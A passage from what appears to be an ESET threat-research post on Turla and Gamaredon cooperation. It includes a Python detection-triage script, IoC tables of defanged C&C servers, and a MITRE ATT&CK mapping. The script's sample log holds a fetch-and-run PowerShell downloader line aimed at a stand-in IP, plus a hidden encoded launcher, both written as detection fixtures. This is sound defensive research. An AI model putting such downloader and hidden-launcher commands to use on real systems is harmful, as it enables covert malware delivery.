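     r"""Start-Process\s+-FilePath\s+["'«]?[^"'»\s]*\\AppData\\Local\\Programs(?:\\|$)""", 2),
]
COMPILED = [(name, re.compile(pattern, re.I), weight) for name, pattern, weight in RULES]

def evaluate(script):
    """Return (score, [names of rules that matched]) for one script block."""
    hits = [(name, weight) for name, rx, weight in COMPILED if rx.search(script)]
    return sum(weight for _, weight in hits), [name for name, _ in hits]

def triage(log_lines, threshold=3):
    """Flag every 'host|user|script' line whose score reaches the threshold."""
    findings = []
    for line in log_lines:
        host, user, script = line.split("|", 2)   # maxsplit=2: scripts may contain pipes
        score, rules = evaluate(script)
        if score >= threshold:
            findings.append({"host": host, "user": user, "score": score, "rules": rules})
    return findings

# Constructed sample log (host|user|script block); hosts, users and 192.0.2.10 are invented.
SAMPLE_LOG = [
    # Shape of the downloader PteroPaste launched in the third chain.
    "WS-01|alice|[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
    "iex(New-Object Net.WebClient).downloadString('https://192.0.2.10/ekrn.ps1');",
    # Shape of the PteroGraphin launcher from the first chain (payload is UTF-16LE 'whoami').
    "WS-02|bob|powershell -windowStyle hidden -EncodedCommand dwBoAG8AYQBtAGkA",
    # Benign administrative pipeline: no rule should fire.
    "WS-03|carol|Get-Service | Where-Object Status -eq 'Running' | Export-Csv C:\\temp\\svc.csv",
    # Start-Process of a side-loading host under a user-writable Programs directory.
    "WS-04|dave|Start-Process -FilePath 'C:\\Users\\dave\\AppData\\Local\\Programs\\Sony\\Audio\\Drivers\\vncutil64.exe'",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```
\n<p>On the constructed log, the PteroPaste-style line scores on three rules and the hidden encoded launcher on one heavy rule, so both are flagged; the administrative pipeline scores zero; the Start-Process line scores 2 on its own and stays below the threshold, which is deliberate: a host executable started from a user-writable directory is weak evidence until it is correlated with the DLL it loads, which is what the in-memory detection of Kazuar supplied in the first chain.<\/p>\n<p>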
Like <span style=\"font-family: courier new, courier, monospace;\">scrss.ps1<\/span>, <span style=\"font-family: courier new, courier, monospace;\">ekrn.ps1<\/span> drops and installs Kazuar v2.<\/p>\n<p>Both samples have an <span style=\"font-family: courier new, courier, monospace;\">agent_label<\/span> of <span style=\"font-family: courier new, courier, monospace;\">AGN-AB-27<\/span> and the C&amp;C servers are the same as those in the sample from the second chain:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/www.brannenburger-nagelfluh[.]de\/wp-includes\/style-engine\/css\/index.php<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/www.pizzeria-mercy[.]de\/wp-includes\/images\/media\/bar\/index.php<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/abrargeospatial[.]ir\/wp-includes\/fonts\/wp-icons\/index.php<\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: courier new, courier, monospace;\">ekrn.exe<\/span> is a legitimate process of ESET endpoint security products. Thus, Turla probably chose the name to masquerade as it in order to fly under the radar. Also note that <span style=\"font-family: courier new, courier, monospace;\">ekrn.ydns[.]eu<\/span> resolves to <span style=\"font-family: courier new, courier, monospace;\">91.231.182[.]187<\/span>.<\/p>\n<p>Finally, we also found on <a href=\"https:\/\/www.virustotal.com\/gui\/file\/3ecb09e659bcb500f9f40d022579a09acb11aec3a92c03e7d3fd2e56982d9eea\" target=\"_blank\" rel=\"noopener\">VirusTotal<\/a> a VBScript variant of the Kazuar v2 PowerShell installer. It was uploaded from Kyrgyzstan on June 5<sup>th<\/sup>, 2025. This suggests that Turla is interested in targets outside of Ukraine as well.<\/p>\n<h2>Conclusion<\/h2>\n<p>In this blogpost, we have shown how Turla was able to leverage implants operated by Gamaredon (PteroGraphin, PteroOdd, and PteroPaste) in order to restart Kazuar v3 and deploy Kazuar v2 on several machines in Ukraine. 
We now believe with high confidence that both groups \u2013 separately associated with the FSB \u2013 are cooperating and that Gamaredon is providing initial access to Turla.<\/p>\n<blockquote>\n<div><em>For any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.\u00a0<\/em><\/div>\n<div><em>ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the <a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=gamaredon-x-turla-collab&amp;sfdccampaignid=7011n0000017htTAAQ\" target=\"_blank\" rel=\"noopener\">ESET Threat Intelligence<\/a> page.<\/em><\/div>\n<\/blockquote>\n<h2>IoCs<\/h2>\n<p>A comprehensive list of indicators of compromise (IoCs) and samples can be found in our <a href=\"https:\/\/github.com\/eset\/malware-ioc\/tree\/master\/turla\">GitHub repository<\/a>.<\/p>\n<h3>Files<\/h3>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"179\"><strong>SHA-1<\/strong><\/td>\n<td width=\"123\"><strong>Filename<\/strong><\/td>\n<td width=\"180\"><strong>Detection<\/strong><\/td>\n<td width=\"161\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">7DB790F75829D3E6207D<wbr\/>8EC1CBCD3C133F596D67<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">PowerShell\/Pterodo.QB<\/td>\n<td width=\"161\">PteroOdd.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">2610A899FE73B8F018D1<wbr\/>9B50BE55D66A6C78B2AF<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">PowerShell\/Pterodo.QB<\/td>\n<td width=\"161\">PteroOdd.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, 
monospace;\">3A24520566BBE2E262A2<wbr\/>911E38FD8130469BA830<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">PowerShell\/Pterodo.QB<\/td>\n<td width=\"161\">PteroOdd.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">DA7D5B9AB578EF648747<wbr\/>3180B975A4B2701FDA9E<\/span><\/td>\n<td width=\"123\"><span style=\"font-family: courier new, courier, monospace;\">scrss.ps1<\/span><\/td>\n<td width=\"180\">PowerShell\/Turla.AI<\/td>\n<td width=\"161\">Kazuar v2 installer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">D7DF1325F66E029F4B77<wbr\/>E211A238AA060D7217ED<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">MSIL\/Turla.N.gen<\/td>\n<td width=\"161\">Kazuar v2.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">FF741330CC8D9624D791<wbr\/>DE9074086BBFB0E257DC<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">PowerShell\/TrojanDo<wbr\/>wnloader.Agent.DV<\/td>\n<td width=\"161\">PowerShell downloader executed by PteroPaste.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">A7ACEE41D66B537D9004<wbr\/>03F0E6A26AB6A1290A32<\/span><\/td>\n<td width=\"123\"><span style=\"font-family: courier new, courier, monospace;\">ekrn.ps1<\/span><\/td>\n<td width=\"180\">PowerShell\/Turla.AJ<\/td>\n<td width=\"161\">Kazuar v2 installer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">54F2245E0D3ADEC566E4<wbr\/>D822274623BF835E170C<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">MSIL\/Agent_AGen.CZQ<\/td>\n<td width=\"161\">Kazuar v2.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">371AB9EB2A3DA44099B2<wbr\/>B7716DE0916600450CFD<\/span><\/td>\n<td width=\"123\"><span style=\"font-family: courier new, courier, 
monospace;\">ekrn.ps1<\/span><\/td>\n<td width=\"180\">PowerShell\/Turla.AJ<\/td>\n<td width=\"161\">Kazuar v2 installer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">4A58365EB8F928EC3CD6<wbr\/>2FF59E59645C2D8C0BA5<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">MSIL\/Turla.W<\/td>\n<td width=\"161\">Kazuar v2.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">214DC22FA25314F9C0DD<wbr\/>A54F669EDE72000C85A4<\/span><\/td>\n<td width=\"123\"><span style=\"font-family: courier new, courier, monospace;\">Sandboxie.vbs<\/span><\/td>\n<td width=\"180\">VBS\/Turla.C<\/td>\n<td width=\"161\">Kazuar v2 installer \u2013 VBScript variant.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Network<\/h3>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"147\"><strong>IP<\/strong><\/td>\n<td width=\"136\"><strong>Domain<\/strong><\/td>\n<td width=\"113\"><strong>Hosting provider<\/strong><\/td>\n<td width=\"85\"><strong>First seen<\/strong><\/td>\n<td width=\"161\"><strong>Details<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"147\">N\/A<\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">lucky-king-96d6.mop<wbr\/>ig92456.workers[.]dev<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"85\">2025\u201102\u201128<\/td>\n<td width=\"161\">Cloudflare worker found in payloads downloaded by PteroOdd.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">64.176.173[.]164<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">eset.ydns[.]eu<\/span><\/td>\n<td width=\"113\">The Constant Company, LLC<\/td>\n<td width=\"85\">2025\u201103\u201101<\/td>\n<td width=\"161\">C&amp;C server found in payloads downloaded by PteroOdd.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span 
style=\"font-family: courier new, courier, monospace;\">85.13.145[.]231<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">hauptschule-schw<wbr\/>albenstrasse[.]de<\/span><\/td>\n<td width=\"113\">Neue Medien Muennich GmbH<\/td>\n<td width=\"85\">2024\u201106\u201106<\/td>\n<td width=\"161\">Compromised WordPress site used as Kazuar C&amp;C.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">91.231.182[.]187<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">ekrn.ydns[.]eu<\/span><\/td>\n<td width=\"113\">South Park Networks LLC<\/td>\n<td width=\"85\">2025\u201106\u201105<\/td>\n<td width=\"161\">C&amp;C server in payloads downloaded by PteroPaste.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">185.118.115[.]15<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">fjsconsultoria[.]com<\/span><\/td>\n<td width=\"113\">Dream Fusion &#8211; IT Services, Lda<\/td>\n<td width=\"85\">2024\u201106\u201126<\/td>\n<td width=\"161\">Compromised WordPress site used as Kazuar C&amp;C.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">77.46.148[.]242<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">ingas[.]rs<\/span><\/td>\n<td width=\"113\">TELEKOM SRBIJA a.d.<\/td>\n<td width=\"85\">2024\u201106\u201103<\/td>\n<td width=\"161\">Compromised WordPress site used as Kazuar C&amp;C.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">168.119.152[.]19<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">abrargeospatial[.]ir<\/span><\/td>\n<td width=\"113\">Hetzner Online GmbH<\/td>\n<td width=\"85\">2023\u201111\u201113<\/td>\n<td width=\"161\">Compromised WordPress 
site used as Kazuar C&amp;C.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">217.160.0[.]33<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">www.brannenburg<wbr\/>er-nagelfluh[.]de<\/span><\/td>\n<td width=\"113\">IONOS SE<\/td>\n<td width=\"85\">2019\u201106\u201106<\/td>\n<td width=\"161\">Compromised WordPress site used as Kazuar C&amp;C.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">217.160.0[.]159<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">www.pizzeria-mercy[.]de<\/span><\/td>\n<td width=\"113\">IONOS SE<\/td>\n<td width=\"85\">2023\u201110\u201105<\/td>\n<td width=\"161\">Compromised WordPress site used as Kazuar C&amp;C.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>MITRE ATT&amp;CK techniques<\/h2>\n<p>This table was built using <a href=\"https:\/\/attack.mitre.org\/resources\/versions\/\">version 17<\/a> of the MITRE ATT&amp;CK framework<strong>.<\/strong><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"113\"><strong>Tactic<\/strong><\/td>\n<td width=\"113\"><strong>ID<\/strong><\/td>\n<td width=\"151\"><strong>Name<\/strong><\/td>\n<td width=\"265\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td rowspan=\"5\" width=\"113\"><strong>Resource Development<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1583\/001\" target=\"_blank\" rel=\"noopener\">T1583.001<\/a><\/td>\n<td width=\"151\">Acquire Infrastructure: Domains<\/td>\n<td width=\"265\">Gamaredon or Turla registered a domain at a free dynamic DNS provider.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1583\/004\" target=\"_blank\" rel=\"noopener\">T1583.004<\/a><\/td>\n<td width=\"151\">Acquire Infrastructure: 
Server<\/td>\n<td width=\"265\">Gamaredon or Turla rented a server at Vultr.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1583\/007\" target=\"_blank\" rel=\"noopener\">T1583.007<\/a><\/td>\n<td width=\"151\">Acquire Infrastructure: Serverless<\/td>\n<td width=\"265\">Gamaredon created Cloudflare workers and Telegra.ph pages.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1584\/003\" target=\"_blank\" rel=\"noopener\">T1584.003<\/a><\/td>\n<td width=\"151\">Compromise Infrastructure: Virtual Private Server<\/td>\n<td width=\"265\">Turla compromised WordPress websites.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1608\/\" target=\"_blank\" rel=\"noopener\">T1608<\/a><\/td>\n<td width=\"151\">Stage Capabilities<\/td>\n<td width=\"265\">Turla staged Kazuar installer scripts on its C&amp;C servers.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>Execution<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1059\/001\" target=\"_blank\" rel=\"noopener\">T1059.001<\/a><\/td>\n<td width=\"151\">Command and Scripting Interpreter: PowerShell<\/td>\n<td width=\"265\">PteroGraphin is developed in PowerShell.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>Persistence<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1574\/002\" target=\"_blank\" rel=\"noopener\">T1574.002<\/a><\/td>\n<td width=\"151\">Hijack Execution Flow: DLL Side-Loading<\/td>\n<td width=\"265\">Kazuar loaders use DLL side-loading.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\" width=\"113\"><strong>Defense Evasion<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1140\" target=\"_blank\" rel=\"noopener\">T1140<\/a><\/td>\n<td width=\"151\">Deobfuscate\/Decode Files or Information<\/td>\n<td 
width=\"265\">The Kazuar payload is XOR encrypted and all Kazuar strings are encrypted via substitution tables.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1480\/001\" target=\"_blank\" rel=\"noopener\">T1480.001<\/a><\/td>\n<td width=\"151\">Execution Guardrails: Environmental Keying<\/td>\n<td width=\"265\">Kazuar loaders decrypt the payloads, using the machine name as the key.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1036\/005\" target=\"_blank\" rel=\"noopener\">T1036.005<\/a><\/td>\n<td width=\"151\">Masquerading: Match Legitimate Name or Location<\/td>\n<td width=\"265\">Kazuar loaders are located in legitimate-looking directories such as <span style=\"font-family: courier new, courier, monospace;\">C:\\Program Files (x86)\\Brother Printer\\App\\<\/span> or <span style=\"font-family: courier new, courier, monospace;\">%LOCALAPPDATA%\\Programs\\Sony\\Audio\\<wbr\/>Drivers\\<\/span>.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"4\" width=\"113\"><strong>Discovery<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1057\/\" target=\"_blank\" rel=\"noopener\">T1057<\/a><\/td>\n<td width=\"151\">Process Discovery<\/td>\n<td width=\"265\">The PowerShell script starting Kazuar v3 sends the list of running processes to its C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1012\/\" target=\"_blank\" rel=\"noopener\">T1012<\/a><\/td>\n<td width=\"151\">Query Registry<\/td>\n<td width=\"265\">The PowerShell script starting Kazuar v3 gets the PowerShell version from the registry.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1082\/\" target=\"_blank\" rel=\"noopener\">T1082<\/a><\/td>\n<td width=\"151\">System Information Discovery<\/td>\n<td width=\"265\">The PowerShell script 
starting Kazuar v3 exfiltrates the last boot time, OS version, and OS architecture.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1083\/\" target=\"_blank\" rel=\"noopener\">T1083<\/a><\/td>\n<td width=\"151\">File and Directory Discovery<\/td>\n<td width=\"265\">The PowerShell script starting Kazuar v3 lists files in the directories <span style=\"font-family: courier new, courier, monospace;\">%TEMP%<\/span> and <span style=\"font-family: courier new, courier, monospace;\">%APPDATA%\\Microsoft\\Windows<\/span>.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\" width=\"113\"><strong>Command and Control<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1071\/001\" target=\"_blank\" rel=\"noopener\">T1071.001<\/a><\/td>\n<td width=\"151\">Application Layer Protocol: Web Protocols<\/td>\n<td width=\"265\">PteroGraphin and Kazuar use HTTPS.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1573\/001\" target=\"_blank\" rel=\"noopener\">T1573.001<\/a><\/td>\n<td width=\"151\">Encrypted Channel: Symmetric Cryptography<\/td>\n<td width=\"265\">PteroGraphin decrypts the C&amp;C reply using 3DES.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1102\/\" target=\"_blank\" rel=\"noopener\">T1102<\/a><\/td>\n<td width=\"151\">Web Service<\/td>\n<td width=\"265\">Legitimate web services, such as Telegra.ph, were used in this campaign.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=gamaredon-x-turla-collab&amp;sfdccampaignid=7011n0000017htTAAQ\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/eti-eset-threat-intelligence.png\" 
alt=\"\" width=\"915\" height=\"296\"\/><\/a><\/p>\n<\/div>\n","protected":false},"author":1,"featured_media":242,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-241","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-security"]}